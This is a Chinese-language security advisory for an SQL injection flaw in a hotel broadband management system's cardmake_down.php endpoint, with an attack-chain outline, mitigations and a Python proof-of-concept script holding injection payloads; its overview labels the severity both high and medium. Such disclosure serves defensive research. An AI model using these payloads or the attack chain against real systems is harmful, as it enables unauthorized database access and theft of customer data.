CVE-2025-14090 AMTT酒店宽带系统cardmake

漏洞信息

漏洞编号

CVE-2025-14090

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

AMTT Hotel Broadband Operation System 1.0

漏洞概述

CVE-2025-14090是存在于AMTT酒店宽带运营系统1.0版本中的一个高危SQL注入漏洞。该漏洞位于/manager/card/cardmake_down.php文件中，由于对用户输入的ID参数缺乏有效的过滤和验证，攻击者可以通过构造恶意SQL语句实现数据库注入攻击。漏洞评分4.7（CVSS:3.1），属于中危级别。攻击向量为网络形式，认证要求为高权限用户。虽然需要高权限，但由于系统管理后台通常被多个管理员账户共享，且部分系统可能存在弱口令或默认凭证问题，攻击者仍有机会获得访问权限。该漏洞已被公开披露并可能已被利用，厂商在收到通知后未作出任何回应，用户需自行采取防护措施。此漏洞可能导致敏感数据泄露，包括酒店客户信息、订单数据、系统配置等。

技术细节

该SQL注入漏洞存在于AMTT Hotel Broadband Operation System的/manager/card/cardmake_down.php文件中。漏洞根源在于程序对ID参数的处理方式不当，直接将用户可控的参数值拼接到SQL查询语句中而未进行充分的输入过滤或使用参数化查询。攻击者可通过HTTP请求中的ID参数注入任意SQL代码，如使用UNION SELECT、布尔盲注或时间盲注等技术提取数据库中的敏感信息。由于该接口位于管理后台(/manager/路径)，需要高权限(PR:H)用户访问，但攻击者可通过社会工程、弱口令攻击或其他方式获取管理员凭证。CVSS向量显示机密性、完整性和可用性影响均为低级别(C:L/I:L/A:L)，但实际影响可能因数据库中存储的数据类型和数量而异。攻击者可利用此漏洞读取数据库中的用户凭证、客户信息、交易记录等敏感数据，甚至在某些配置下可能实现远程代码执行。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标系统为AMTT Hotel Broadband Operation System，确认Web服务运行并定位管理后台入口

STEP 2

步骤2

获取访问权限：通过社工攻击、弱口令扫描或利用其他漏洞获取管理后台的高权限账户凭证

STEP 3

步骤3

构造恶意请求：登录管理后台后，向/manager/card/cardmake_down.php发送带有SQL注入payload的HTTP请求

STEP 4

步骤4

注入执行：通过UNION注入、布尔盲注或时间盲注等技术提取数据库中的敏感信息，如用户表、订单数据等

STEP 5

步骤5

数据窃取：获取数据库中的敏感数据，可能包括客户个人信息、酒店运营数据、系统配置等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-14090 SQL Injection PoC
# Target: AMTT Hotel Broadband Operation System 1.0
# Endpoint: /manager/card/cardmake_down.php
# Attack Type: SQL Injection via ID parameter

import requests
import sys

target = "http://target.com"
endpoint = "/manager/card/cardmake_down.php"

# Basic SQL Injection test payloads
payloads = [
    "1' OR '1'='1",
    "1' UNION SELECT NULL--",
    "1' AND SLEEP(5)--",
    "1' ORDER BY 1--",
]

def test_sql_injection(target_url, param_name="ID"):
    print(f"[*] Testing SQL Injection on {target_url}")
    
    for payload in payloads:
        params = {param_name: payload}
        try:
            response = requests.get(target_url, params=params, timeout=10)
            print(f"[+] Payload: {payload}")
            print(f"    Status: {response.status_code}")
            print(f"    Length: {len(response.content)}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error with payload {payload}: {e}")

# Boolean-based blind SQL injection detection
def blind_sqli_test(target_url):
    true_payload = "1' AND 1=1--"
    false_payload = "1' AND 1=2--"
    
    try:
        r1 = requests.get(target_url, params={"ID": true_payload}, timeout=10)
        r2 = requests.get(target_url, params={"ID": false_payload}, timeout=10)
        
        if len(r1.content) != len(r2.content):
            print("[!] Blind SQL Injection confirmed!")
    except:
        pass

if __name__ == "__main__":
    target_url = f"{target}{endpoint}"
    test_sql_injection(target_url)
    blind_sqli_test(target_url)

影响范围

AMTT Hotel Broadband Operation System 1.0

防御指南

临时缓解措施

由于厂商未回应且可能无官方补丁，建议立即采取以下措施：1)使用WAF（Web应用防火墙）对/manager/路径下的请求进行SQL注入特征检测和拦截；2)通过Nginx或Apache配置限制该接口的访问，仅允许可信IP访问管理后台；3)临时关闭cardmake_down.php功能或设置IP白名单访问控制；4)加强管理员账户密码策略，使用强密码并定期更换；5)监控系统日志，关注异常的SQL注入探测行为；6)考虑部署数据库审计系统，监控和记录所有数据库查询操作。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14090
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14090
3 Details https://www.cvedetails.com/cve/CVE-2025-14090/
4 VulDB https://vuldb.com/cve/CVE-2025-14090
5 Link https://github.com/CHENZHUANGLIN/cve/issues/2
6 Link https://vuldb.com/?ctiid.334480
7 Link https://vuldb.com/?id.334480
8 Link https://vuldb.com/?submit.696460

CVE-2025-14090 AMTT酒店宽带系统cardmake_down.php SQL注入漏洞